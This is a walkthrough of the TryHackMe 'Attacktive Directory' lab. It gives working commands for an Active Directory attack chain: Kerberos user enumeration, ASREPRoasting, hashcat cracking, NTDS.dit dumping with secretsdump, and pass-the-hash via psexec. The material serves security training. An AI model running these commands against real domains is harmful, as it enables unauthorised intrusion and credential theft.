Master Active Directory: Attacktive Directory (TryHackMe) Walkthrough

Attacktive Directory Walkthrough (TryHackMe)

Active Directory Enumeration → Kerberos Abuse → Domain Compromise

About This Walkthrough

This guide documents the full exploitation path for the Attacktive Directory machine on TryHackMe.

The objective is to walk through a realistic Active Directory attack chain, covering the core pillars of a Windows domain engagement:

Enumeration

Kerberos exploitation

Credential harvesting

Lateral movement and full domain compromise

This is a hands-on, attacker-side perspective, designed for learners who already understand basic networking and Linux tooling.

Learning Objectives

By the end of this walkthrough, you will understand how to:

AD Enumeration
Map domain services, users, and attack surface.

Kerberos Exploitation
Abuse misconfigurations using ASREPRoasting.

Credential Harvesting
Crack Kerberos hashes using Hashcat.

Domain Takeover
Dump NTDS.dit and perform Pass-the-Hash attacks.

Tooling Requirements

Ensure the following tools are installed before starting:

Impacket
A powerful collection of scripts for interacting with Windows protocols.

Kerbrute
Used for Kerberos-based username enumeration.

Enum4linux
Useful for SMB and NetBIOS discovery.

Hashcat
Industry-standard password cracking tool.

Step-by-Step Walkthrough
1. Enumeration (DNS & Ports)

First, map the target IP address to the domain name:

echo "10.10.194.183 spookysec.local" | sudo tee -a /etc/hosts


Next, run a targeted scan against Active Directory–related ports:

nmap -p53,88,135,139,389,445,636,3268 -A -T4 spookysec.local


This confirms:

Domain Controller presence

Kerberos (88)

LDAP (389/636)

SMB (445)

2. Finding Valid Users (Kerberos Enumeration)

Kerberos allows username validation without triggering account lockouts.

Using Kerbrute, enumerate valid domain users:

kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt


Any valid usernames discovered here become prime candidates for Kerberos attacks.

3. ASREPRoasting (Initial Access)

If a user account has “Do not require Kerberos pre-authentication” enabled, you can request a Ticket Granting Ticket (TGT) without credentials.

Use Impacket’s GetNPUsers.py:

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -usersfile userlist.txt


This returns an AS-REP hash that can be cracked offline.

4. Cracking Kerberos Hashes

Use Hashcat to crack the AS-REP hash.

Hash mode: 18200 (Kerberos 5 AS-REP)

hashcat -m 18200 hash.txt wordlist.txt


Once cracked, you gain plaintext credentials for a domain account.

5. Privilege Escalation & Domain Admin

With valid service account credentials, dump secrets directly from the Domain Controller:

python3 secretsdump.py -just-dc backup@spookysec.local


This extracts:

NTLM hashes

Domain Administrator credentials

Full Active Directory credential database (NTDS.dit)

6. Pass-the-Hash (Domain Compromise)

Using the Administrator NTLM hash, authenticate without knowing the password:

python3 psexec.py Administrator@spookysec.local -hashes :


You now have:

SYSTEM shell

Full Domain Admin access

Complete domain compromise

Key Takeaways

Kerberos misconfigurations often provide silent initial access

Password cracking is still one of the weakest links in AD security

Service accounts are frequent escalation paths

NTLM hashes are often as powerful as plaintext passwords